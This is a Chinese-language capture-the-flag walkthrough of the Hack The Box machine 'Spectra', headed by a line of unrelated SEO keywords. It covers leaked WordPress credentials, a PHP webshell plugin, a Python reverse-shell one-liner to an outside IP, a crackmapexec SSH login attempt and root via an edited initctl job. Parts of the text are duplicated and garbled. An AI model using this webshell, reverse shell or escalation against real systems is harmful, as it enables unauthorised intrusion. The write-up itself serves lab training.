企业网站建设方案精英,免费模板网站建设,做兼职在线抠图网站,linode上传安装wordpressEnumeration
nmap
第一次扫描发现系统对外开放了22#xff0c;80和3306端口#xff0c;端口详细信息如下 22端口运行着ssh#xff0c;80端口还是http#xff0c;不过不同的是打开了mysql的3306端口 TCP/80
进入首页#xff0c;点击链接时#xff0c;提示域名不能解析80和3306端口端口详细信息如下 22端口运行着ssh80端口还是http不过不同的是打开了mysql的3306端口 TCP/80
进入首页点击链接时提示域名不能解析需要在/etc/hosts中添加
10.10.10.229 spectra.htb 配置好后点击Software Issue Tracker跳转到/main可以看到该网站使用了wordpress 另一个链接Test会跳转至/testing/index.php网站无法连接显示数据库链接错误 直接访问/testing会列出其他目录但是wp-config.php文件似乎在服务器上使用nano编辑过生成了.save文件 点击该文件并没有什么显示但是查看源代码会展现很多内容其中包括了wordpress的数据库信息 回到刚刚的/main页面在页面底部有login链接但是使用刚刚获取的用户名密码显示用户名无效 但是使用administrator:devteam01却成功登录wordpress系统
Foothold
登录到wordpress后台 可以上传一个php文件作为新的插件
?php
/*
Plugin Name: vegetable Plugin Version: 1.0.0
Author: vegetable Author URI: wordpress.org License: GPL2
*/
system($_REQUEST[cmd]); ?
将该php文件添加至zip 在wordpress后台选择plugins→add new 然后选择刚才创建的shell.zip再点击install now 跳转页面后再点击activate plugin 然后可以在插件列表中看到刚刚上传的插件 然后可以验证webshell是否成功上传 可以利用反向shell连接
访问
http://spectra.htb/main/wp-content/plugins/shell/shell.php?cmdpython%20-
c%20%27import%20socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.3%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);psubprocess.call([%22/bin/sh%22,%22-i%22]);%27
nc会监听到一个反向shell 升级shell Lateral Movement
枚举系统发现了Chrome Os Chrome OS 会将交互式登录用户的配置文件文件夹存储在/home/user/但是却无法进入该文件 在/opt目录下有一个autologin.conf.prig 该脚本给出两条路径但只有一个存在其中的passwd文件似乎保存了一个密码 然后发现能登录的用户只有这几个 将这几个用户保存到一个文件中形成用户名字典然后利用crackmapexec程序看看哪个能成功登陆
crackmapexec ssh 10.10.10.229 -u user -p SummerHereWeCome!! --continue-on-success 可以使用katie:SummerHereWeCome!!通过ssh登录系统 Privilege Escalation
使用sudo -l发现可以执行initctl是init守护进程控制工具 使用id命令发现katie属于developers组 尝试搜索该组拥有的文件 test*.conf都是一样的 node.js文件来启动一个web 将/etc/init/test.conf的内容修改为
然后执行sudo initctl start test
之后会在/tmp/vegetable中写入id证明命令被执行 则可以往脚本中添加反向shell脚本
script exec id /tmp/vegetableexport HOME/srv echo $$ /var/run/nodetest.pidexec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js end script 和刚才一样操作之后就可以获取root权限
